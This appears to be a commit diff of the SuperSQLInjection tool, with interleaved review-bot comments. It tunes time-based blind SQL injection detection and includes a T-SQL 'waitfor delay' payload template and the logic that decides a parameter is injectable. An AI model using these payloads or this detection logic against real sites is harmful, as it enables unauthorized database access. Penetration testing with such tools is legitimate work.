update20190404

20190404 V1.0 正式版---
修复延时注入部分情况下无法获取数据的问题,优化注入判断。
shack2
2019-04-04 16:43:55 +08:00
parent 0a46dc3500
commit 0414049918
5 changed files with 19 additions and 13 deletions


@@ -311,7 +311,7 @@ namespace SuperSQLInjection
return sid; return sid;
} }
public static int version = 20190403; public static int version = 20190404;
public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=SSuperSQLInjection&NO=" + URLEncode.UrlEncode(getSid()) + "&VERSION=" + version; public static string versionURL = "http://www.shack2.org/soft/getNewVersion?ENNAME=SSuperSQLInjection&NO=" + URLEncode.UrlEncode(getSid()) + "&VERSION=" + version;
//检查更新 //检查更新
public void checkUpdate() public void checkUpdate()
@@ -6859,8 +6859,8 @@ namespace SuperSQLInjection
//读取payload //读取payload
List<String> sleep_list = FileTool.readFileToList("config/injection/sleep_injection.txt"); List<String> sleep_list = FileTool.readFileToList("config/injection/sleep_injection.txt");
//测试平均时间5 //测试平均时间3
int n = 5; int n = 3;
int index = 0; int index = 0;
List<int> time_list = new List<int>(); List<int> time_list = new List<int>();
while (index < n) while (index < n)
@@ -6875,7 +6875,7 @@ namespace SuperSQLInjection
int avg = Tools.getMaxSecondByMillisecond(Tools.getAvg(time_list)); int avg = Tools.getMaxSecondByMillisecond(Tools.getAvg(time_list));
if (avg != 0) if (avg != 0)
{ {
int time = avg + 2; int time = avg + 1;
if (config.timeOut < time) if (config.timeOut < time)
{ {
@@ -6897,18 +6897,18 @@ namespace SuperSQLInjection
config.timeOut += 5; config.timeOut += 5;
} }
} }
String[] pals = cpal.Split(DBVers_Splite_Str); String[] pals = cpal.Split(DBVers_Splite_Str);
String cpayload = pals[0].Replace("{time}", time.ToString()); String cpayload = pals[0].Replace("{time}", time.ToString());
this.txt_log.Invoke(new showLogDelegate(log), "正在测试PayLoad:" + cpayload, LogLevel.info); this.txt_log.Invoke(new showLogDelegate(log), "正在测试PayLoad:" + cpayload, LogLevel.info);
ServerInfo sleepServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, cpayload, payload_request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet); ServerInfo sleepServer = HTTP.sendRequestRetry(config.useSSL, config.reTry, config.domain, config.port, cpayload, payload_request, config.timeOut, config.encoding, config.is_foward_302, config.redirectDoGet);
if (sleepServer.runTime > time * 1000) if (sleepServer.runTime > time * 1000-Tools.deviation)
{ {
this.cbox_inject_type.SelectedIndex = Convert.ToInt32(KeyType.Time); this.cbox_inject_type.SelectedIndex = Convert.ToInt32(KeyType.Time);
this.chk_inject_reverseKey.Checked = false; this.chk_inject_reverseKey.Checked = false;
config.injectType = InjectType.Blind; config.injectType = InjectType.Blind;
sleepInject = true; sleepInject = true;
selectInjectType(InjectType.Blind); selectInjectType(InjectType.Blind);
newParam = strparam.Replace(param, param + "<Encode>" + cpayload.Replace(pals[3], setInjectStr) + "</Encode>"); newParam = strparam.Replace(param, param + "<Encode>" + pals[0].Replace(pals[3], setInjectStr) + "</Encode>");
config.request = request.Replace(strparam, newParam); config.request = request.Replace(strparam, newParam);
this.txt_inject_request.Text = request.Replace(strparam, newParam); this.txt_inject_request.Text = request.Replace(strparam, newParam);
currentDB = pals[2]; currentDB = pals[2];
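Review bot: The time-based verdict on the line `if (sleepServer.runTime > time * 1000-Tools.deviation)` subtracts a flat 20 ms, while Tools.cs in this same commit applies the tolerance per second of delay (`time*1000-(time*deviation)`), so for any time > 1 the probe that switches the tool into Blind/Time mode and the checker that later reads data use different thresholds. The decision also rests on a single measurement against a delay of only avg+1 seconds with no negative control, so network jitter or a momentarily slow backend can set `sleepInject = true` on a parameter that is not injectable, after which every boolean extraction runs against noise. I would use the same formula as Tools.cs, `if (sleepServer.runTime > time * 1000 - time * Tools.deviation)`, and confirm with one more request whose condition is false (expecting `runTime` below that threshold) before changing `config.injectType`. `HTTP.sendRequestRetry` is handed `config.reTry`, and whether `runTime` covers only the final attempt is not visible here — if it accumulates across retries, a timed-out first attempt alone would satisfy the check. The enclosing method starts and ends outside this section.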


@@ -32,5 +32,5 @@ using System.Runtime.InteropServices;
// 可以指定所有这些值,也可以使用“内部版本号”和“修订号”的默认值, // 可以指定所有这些值,也可以使用“内部版本号”和“修订号”的默认值,
// 方法是按如下所示使用“*”: // 方法是按如下所示使用“*”:
// [assembly: AssemblyVersion("1.0.*")] // [assembly: AssemblyVersion("1.0.*")]
[assembly: AssemblyVersion("1.2019.04.03")] [assembly: AssemblyVersion("1.2019.04.04")]
[assembly: AssemblyFileVersion("1.2019.04.03")] [assembly: AssemblyFileVersion("1.2019.04.04")]


@@ -92,7 +92,7 @@ namespace SuperSQLInjection.payload
public static String getBoolDataBySleep(String data, int maxTime) public static String getBoolDataBySleep(String data, int maxTime)
{ {
return " 1=1 if(" + data + ") waitfor delay '0:0:" + maxTime + "'"; return " if(" + data + ") waitfor delay '0:0:" + maxTime + "'";
} }
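Review bot: `getBoolDataBySleep` has no XML summary, unlike the member that follows it (a `/// <summary>` is visible on the next line), and now that the `1=1` prefix is gone the caller must supply the surrounding condition context itself, so the contract should be written down. I would add `/// <summary>T-SQL time-based probe: WAITFOR DELAY fires for <paramref name="maxTime"/> whole seconds only when the condition in <paramref name="data"/> is true; <paramref name="data"/> is inserted verbatim and the caller supplies the enclosing statement context.</summary>` above the method. The delay is emitted as `'0:0:N'` with N in seconds, which deserves a `<param name="maxTime">` line so callers do not pass milliseconds.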
/// <summary> /// <summary>


@@ -21,6 +21,9 @@ namespace tools
{ {
public const String httpLogPath = "logs/http/"; public const String httpLogPath = "logs/http/";
//由于计数器有误差(可能客户端计数小于服务端,,如果页面正常响应时间非常快,可能导致返回时间可能提前,所以考虑设置一个误差值)
public const int deviation = 20;
public static long currentMillis() public static long currentMillis()
{ {
return (long)(DateTime.UtcNow - new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalMilliseconds; return (long)(DateTime.UtcNow - new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalMilliseconds;
@@ -495,7 +498,7 @@ namespace tools
case KeyType.Time: case KeyType.Time:
//由于计数器有误差(可能客户端计数小于服务端,,如果页面正常响应时间非常快,可能导致返回时间可能提前,所以考虑设置一个误差值) //由于计数器有误差(可能客户端计数小于服务端,,如果页面正常响应时间非常快,可能导致返回时间可能提前,所以考虑设置一个误差值)
int time = Tools.convertToInt(key); int time = Tools.convertToInt(key);
if (server.runTime > (time*1000-(time*20))) if (server.runTime > (time*1000-(time*deviation)))
{ {
if (reverKey) if (reverKey)
{ {
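Review bot: The new `deviation` constant is documented only by a copy of the comment that already sits inside the `KeyType.Time` case, and neither states its unit: at this use site it is multiplied by `time`, so it is milliseconds of tolerance per second of requested delay (a 2% margin), whereas the other file in this commit subtracts `Tools.deviation` unscaled as a flat 20 ms. I would replace the added comment with `// Timing tolerance in ms per second of requested delay (2%): the client-measured runTime can undershoot the server-side sleep because of clock/latency skew.` and have both call sites use the same scaled form. If `Tools.convertToInt(key)` yields 0 for a malformed key, the threshold becomes 0 and every response with a non-zero `runTime` counts as a hit, so a guard that rejects `time <= 0` before the comparison would make that explicit — convertToInt's behaviour is not visible here. The switch and its enclosing method start and end outside this section.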


@@ -1,8 +1,11 @@
20190403 V1.0 正式版--- 20190404 V1.0 正式版---
修复延时注入部分情况下无法获取数据的问题,优化注入判断。
20190403 V1.0 正式版---
修复因为导入配置文件编码有可能为空值导致无法正确解码而报错无法获取数据的问题。(程序异常提示:获取值发生异常:“”不是支持的编码名)。 修复因为导入配置文件编码有可能为空值导致无法正确解码而报错无法获取数据的问题。(程序异常提示:获取值发生异常:“”不是支持的编码名)。
20190319 V1.0 正式版--- 20190319 V1.0 正式版---
修复变量无法复制问题。 修复环境变量无法复制问题。
修复MySQL部分情况下当字段出现空值无法获取数据的问题。 修复MySQL部分情况下当字段出现空值无法获取数据的问题。
20190310 V1.0 正式版--- 20190310 V1.0 正式版---